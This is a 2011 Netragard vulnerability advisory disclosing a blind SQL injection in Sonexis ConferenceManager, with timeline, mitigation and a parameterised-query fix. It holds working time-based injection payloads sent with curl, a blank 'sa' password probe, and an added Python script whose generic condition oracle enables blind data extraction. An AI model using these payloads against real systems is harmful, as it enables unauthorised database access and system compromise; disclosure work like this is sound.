*************************** NETRAGARD ADVISORY ************************
http://www.netragard.com
Research Driven Penetration Testing

[POSTING NOTICE]
--------------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents of
the advisory may be updated. The advisory can be found on the Netragard
website at http://www.netragard.com/

For more information about Netragard visit http://www.netragard.com

[Advisory Information]
--------------------------------------------------------------------------
Contact               : Adriel T. Desautels
Advisory ID           : NETRAGARD-20110910 (Corrected)
Researcher            : Kevin Finisterre & Team
Product Name          : Sonexis ConferenceManager
Product Version       : 9.3.14.0 (Tested On)
Vendor Name           : Sonexis Technology, Inc.
Type of Vulnerability : Blind SQL Injection
Impact                : Critical
Date Discovered       : 01/19/2011
Vendor Notified       : 01/26/2011

[Notes About This Advisory]
--------------------------------------------------------------------------
Netragard's team discovered and exploited this vulnerability on January
19th 2011 during the delivery of research based penetration testing
services. Netragard notified the vendor about this vulnerability on
January 26th 2011. Netragard did not receive any communications back from
Sonexis after initial notification.

According to an advisory published by Solutionary, Solutionary discovered
this same vulnerability on 01/27/2011. Solutionary notified Sonexis of the
vulnerability on 02/18/2011 and received a vendor response back on
03/02/2011. Solutionary published a low detail advisory for this issue on
04/06/2011.

It is Netragard's policy to refrain from publishing vulnerabilities until
after methods for remediation have been created/provided. Exceptions to
this policy are made in the event that vendors are non-responsive or in
the event that the vulnerability becomes public knowledge.
[Product Description]
--------------------------------------------------------------------------
"The Sonexis ConferenceManager offers unbeatable value. Our high-quality
audio platform is recognized for its ease-of-use, security, and
cost-effectiveness — and it offers a comprehensive set of integrated Web
conferencing capabilities. Better still, our unique architecture allows
you unlimited flexibility. You're never more than a license key away from
increasing users, adding Web functionality, or changing from one protocol
to another. Simply put, it's the best thing to happen to conferencing."

Taken From: http://www.sonexis.com/products/product_details.asp

[Technical Summary]
--------------------------------------------------------------------------
The Sonexis ConferenceManager does not adhere to best practices as defined
by the Open Web Application Security Project (OWASP), the de facto
standard for Web Application Security. Specifically, the Sonexis
ConferenceManager fails the OWASP Data Validation Criterion as well as
others that are not discussed in this advisory.

This advisory discloses details about a Blind SQL Injection vulnerability
that was discovered by Netragard during the delivery of research driven
penetration testing services. Successful exploitation of this
vulnerability enables the attacker to take full control of the affected
system.

Netragard has created and will provide Proof of Concept code for this
vulnerability shortly after the publication of this Advisory.

Netragard has not received any information from the vendor since initial
notification. As of the time of the authoring of this Advisory no official
vendor patches have been made public. Netragard has provided methods for
mitigation in this advisory.
For more information about OWASP criteria please visit the URL below:

--> https://www.owasp.org/index.php/Category:Vulnerability <--

[Technical Details]
--------------------------------------------------------------------------
The tests shown below can be used to determine if your Sonexis
ConferenceManager is vulnerable. Each test injects a "waitfor delay"
statement through the txtConferenceID parameter of /login/hostlogin.asp
and measures the response time with the shell's "time" command. Compare
the result against the response time for a benign value (roughly 0.3
seconds in the environment below, see TEST 4) so that ordinary network
latency is not mistaken for an injected delay.

Test Environment:
-----------------
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000

--- TEST 1 ---

Validated SQL command execution with the "waitfor+delay+'0:0:3'--" SQL
command. If command execution is a success then time should return a
"real" value of roughly 3 seconds.

netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:3'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real    0m3.281s    <--- Command Execution Successful!
user    0m0.000s
sys     0m0.004s

--- END TEST 1 ---

--- TEST 2 ---

Validated SQL command execution with the "waitfor+delay+'0:0:5'--" SQL
command. If command execution is a success then time should return a
"real" value of roughly 5 seconds.

netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:5'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real    0m5.277s    <--- Command Execution Successful!
user    0m0.001s
sys     0m0.003s

--- END TEST 2 ---

--- TEST 3 ---

Validated SQL command execution with the "waitfor+delay+'0:0:10'--" SQL
command. If command execution is a success then time should return a
"real" value of roughly 10 seconds.

netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:10'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real    0m10.280s   <--- Command Execution Successful!
user    0m0.002s
sys     0m0.004s

--- END TEST 3 ---

--- TEST 4 ---

This test is an example of how to check for a blank "sa" password in the
MsSQL Database. The injected statement opens a loopback connection to the
local SQL Server as "sa" with an empty password via OPENROWSET and only
executes the delay if that connection succeeds. If the password is set
then there will be no delay in server response.
If the password is not set, then there will be a 10 second delay. The two
runs below show each outcome.

netragard:~$ time curl -d "txtConferenceID=1';if (SELECT 1 from OPENROWSET('SQLoledb','server=127.0.0.1;uid=sa;pwd=', 'select 1')) = 1 waitfor+delay'0:0:10';--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real    0m0.305s    <-- Password is set (no delay).
user    0m0.003s
sys     0m0.001s

netragard:~$ time curl -d "txtConferenceID=1';if (SELECT 1 from OPENROWSET('SQLoledb','server=127.0.0.1;uid=sa;pwd=', 'select 1')) = 1 waitfor+delay'0:0:10';--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1

real    0m10.101s   <-- Password is not set (delay).
user    0m0.002s
sys     0m0.003s

--- END TEST 4 ---

[Impact]
--------------------------------------------------------------------------
Exploitation Difficulty : Trivial
Risk                    : Complete System Compromise, Distributed
                          Metastasis, Access To Sensitive Data, etc.

[Proof Of Concept]
--------------------------------------------------------------------------
Netragard created a Proof of Concept exploit for this vulnerability that
will be published on Netragard's website shortly after the release of this
advisory.

[Vendor Status and Chronology]
--------------------------------------------------------------------------
01/19/2011 - Vulnerability Discovered and Exploited by Netragard, LLC.
01/26/2011 - Vendor Notified of the Vulnerability by Netragard, LLC.
01/27/2011 - Vulnerability Discovered by Solutionary.
02/18/2011 - Vendor Notified of the Vulnerability by Solutionary.
03/02/2011 - Vendor Responds to Solutionary.
04/06/2011 - Solutionary publishes a low detail advisory with no mitigation.
04/10/2011 - Netragard publishes high detail advisory with mitigation.

[Mitigation]
--------------------------------------------------------------------------
This vulnerability can be mitigated by filtering application requests with
a Web Application Firewall. Further mitigation can be accomplished with
custom filtering done through the Web Server configuration. At a minimum
such filters must cover the txtConferenceID parameter of
/login/hostlogin.asp used in the tests above, and the tests should be
re-run afterwards to confirm that the injected delays no longer occur.
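The four timing tests above, automated as an added example that is not part of the Netragard advisory or of its Proof of Concept: a Python checker that builds the same txtConferenceID payloads as TEST 1-4, measures response times against a baseline taken with a benign value, and requires every one of the escalating delays (3, 5, 10 seconds) to appear before reporting the host as injectable, so a single slow response cannot produce a false positive. condition_holds() generalises TEST 4 into a boolean oracle for any SQL condition. The TARGET URL is the advisory's masked host and is a placeholder, and simulated_probe() is a constructed stand-in for that host so the logic can be run offline; pass a real URL on the command line to use the HTTP probe instead. The same script can be re-run after a WAF or web server filter is deployed to verify that the delays are gone.

```python
import re
import sys
import time
import urllib.parse
import urllib.request
from typing import Callable

# Placeholder target: the advisory masks the host as xxx.xxx.xxx.xxx.
TARGET = "http://xxx.xxx.xxx.xxx/login/hostlogin.asp"
PARAM = "txtConferenceID"

# TEST 4's condition, as in the advisory: true only when sa has no password.
SA_BLANK_PASSWORD = ("(SELECT 1 from OPENROWSET('SQLoledb',"
                     "'server=127.0.0.1;uid=sa;pwd=', 'select 1')) = 1")


def waitfor_payload(seconds: int) -> str:
    """TEST 1-3: close the string literal, WAITFOR DELAY, comment out the rest.
    urlencode() turns the spaces into the '+' seen in the curl commands."""
    return f"1' waitfor delay '0:0:{seconds}'--"


def condition_payload(condition: str, seconds: int = 10) -> str:
    """TEST 4 generalised: the delay fires only when `condition` is true."""
    return f"1';if ({condition}) waitfor delay '0:0:{seconds}';--"


def http_probe(payload: str, timeout: float = 30.0) -> float:
    """POST the payload as txtConferenceID and return the round trip in seconds."""
    body = urllib.parse.urlencode({PARAM: payload}).encode()
    start = time.monotonic()
    try:
        urllib.request.urlopen(TARGET, data=body, timeout=timeout).read()
    except Exception:
        pass  # an error page still arrives only after the delay has elapsed
    return time.monotonic() - start


def is_time_injectable(probe: Callable[[str], float], delays=(3, 5, 10),
                       tolerance: float = 1.0) -> bool:
    """Replay the advisory's escalating delays and require each one to show up
    in the response time, net of a baseline measured with a benign value."""
    baseline = min(probe("1") for _ in range(3))
    for d in delays:
        net = probe(waitfor_payload(d)) - baseline
        if abs(net - d) > tolerance:
            return False
    return True


def condition_holds(probe: Callable[[str], float], condition: str,
                    seconds: int = 10, tolerance: float = 1.0) -> bool:
    """Boolean oracle: True if the conditional delay fired."""
    baseline = probe("1")
    return probe(condition_payload(condition, seconds)) - baseline >= seconds - tolerance


def simulated_probe(vulnerable: bool, sa_blank: bool) -> Callable[[str], float]:
    """Constructed stand-in for the masked host so the checker runs offline:
    emulates a backend that executes the injected text and reports the elapsed
    time instead of sleeping. Only the blank-sa condition is modelled."""
    def probe(payload: str) -> float:
        elapsed = 0.3  # baseline round trip, matching the advisory's output
        if not vulnerable:
            return elapsed
        m = re.search(r"waitfor delay '0:0:(\d+)'", payload)
        if m is None:
            return elapsed
        wait = int(m.group(1))
        if payload.startswith("1';if ("):
            if "uid=sa;pwd=" in payload and sa_blank:
                elapsed += wait
        else:
            elapsed += wait
        return elapsed
    return probe


if __name__ == "__main__":
    if len(sys.argv) > 1:          # a real target URL was supplied
        TARGET = sys.argv[1]
        probe = http_probe
    else:                          # default: the constructed simulation
        probe = simulated_probe(vulnerable=True, sa_blank=False)
    print("time-based injection:", is_time_injectable(probe))
    print("sa password blank   :", condition_holds(probe, SA_BLANK_PASSWORD))
```

Against the real host the HTTP probe should be pointed only at systems you are authorised to test, and the 30 second timeout must stay above the largest delay requested or a genuine hit will be counted as a failure.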
Note: Mitigation does not constitute a proper fix. If an attacker is able
to circumvent mitigation techniques then exploitation is still possible.
An example of Web Application Firewall subversion can be found at the
following URL:

http://pentest.netragard.com/?p=10

[Solution]
--------------------------------------------------------------------------
Vendor must perform a review of the Sonexis ConferenceManager source code
and ensure that it adheres to the OWASP criteria. In particular,
user-supplied values such as txtConferenceID must not be concatenated into
SQL statements; they should be supplied as parameters of parameterized
queries so that a quote character in the input can never terminate the
string literal as it does in the tests above.

[Disclaimer]
------------------------http://www.netragard.com--------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to help
the I.T. community protect themselves against a potentially dangerous
security hole. This advisory is not an attempt to solicit business.